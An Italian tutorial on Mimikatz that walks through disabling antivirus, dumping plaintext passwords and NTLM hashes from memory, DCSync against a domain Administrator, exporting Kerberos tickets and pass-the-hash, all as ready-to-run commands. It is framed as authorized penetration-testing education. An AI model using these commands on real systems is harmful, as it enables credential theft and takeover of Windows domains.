Introduzione

Mimikatz è uno strumento potente progettato per estrarre password, hash, codici PIN e ticket Kerberos dalla memoria in chiaro. È ampiamente utilizzato da penetration tester e professionisti della sicurezza per valutare le vulnerabilità dei sistemi. Questa guida fornisce un approccio passo-passo per installare e utilizzare Mimikatz per test di sicurezza etici.

Attenzione: L’uso non autorizzato di Mimikatz è illegale. Assicurati di avere il permesso esplicito prima di utilizzarlo in qualsiasi ambiente.

Requisiti

Prima di installare Mimikatz, assicurati di avere quanto segue:

  • Una macchina Windows (Windows 7, 10, 11 o Server)

  • Privilegi da amministratore

  • Windows Defender e qualsiasi software antivirus disabilitati (Mimikatz è spesso segnalato come malware)

Download di Mimikatz

Mimikatz è uno strumento open-source disponibile su GitHub. Per scaricarlo:

  1. Apri il tuo browser web e vai a
    https://github.com/gentilkiwi/mimikatz

  2. Clicca Codice > Scarica ZIP.

  3. Estrai il file ZIP in una directory a tua scelta.

Puoi anche clonare il repository usando Git:

git clone https://github.com/gentilkiwi/mimikatz.git

Esecuzione di Mimikatz

Poiché Mimikatz richiede privilegi da amministratore, segui questi passaggi:

  1. Apri Prompt dei comandi o PowerShell come amministratore.

  2. Naviga nella cartella in cui hai estratto Mimikatz:

    cd pathtomimikatzx64

  3. Avvia Mimikatz:

    mimikatz.exe

Ora dovresti vedere l’interfaccia della riga di comando con il prompt:
mimikatz #

Comandi di base di Mimikatz

1. Controlla i privilegi di sistema

Prima di estrarre le credenziali, verifica di avere privilegi sufficienti:

privilege::debug

Se hai successo, dovresti vedere:
Privilegio ’20’ OK

Estrai password dalla memoria

Per estrarre le password memorizzate in memoria, usa:

sekurlsa::logonpasswords

Questo mostrerà nomi utente, domini e password in chiaro se disponibili.

Dump degli hash NTLM

Gli hash NTLM possono essere utilizzati per attacchi pass-the-hash. Per estrarli:

lsadump::sam

O per sistemi remoti:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

Dump dei ticket Kerberos

Per estrarre i ticket Kerberos dal sistema:

sekurlsa::tickets /export

Questo esporta file .kirbi, che possono essere utilizzati in attacchi pass-the-ticket.

Attacco Pass-the-Hash

Per autenticarsi utilizzando un hash NTLM invece di una password:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>

Conclusione

Mimikatz rimane uno degli strumenti più potenti per valutare la sicurezza dei sistemi Windows grazie alla sua capacità di estrarre password, hash e ticket Kerberos direttamente dalla memoria. Quando utilizzato in modo responsabile ed etico, aiuta i professionisti a identificare vulnerabilità, verificare le configurazioni dell’infrastruttura di dominio e migliorare la postura di sicurezza complessiva di un’organizzazione. Tuttavia, è fondamentale ricordare che strumenti come Mimikatz devono essere utilizzati solo con autorizzazione ufficiale e in ambienti controllati, poiché l’uso non autorizzato viola la legge e può portare a gravi conseguenze.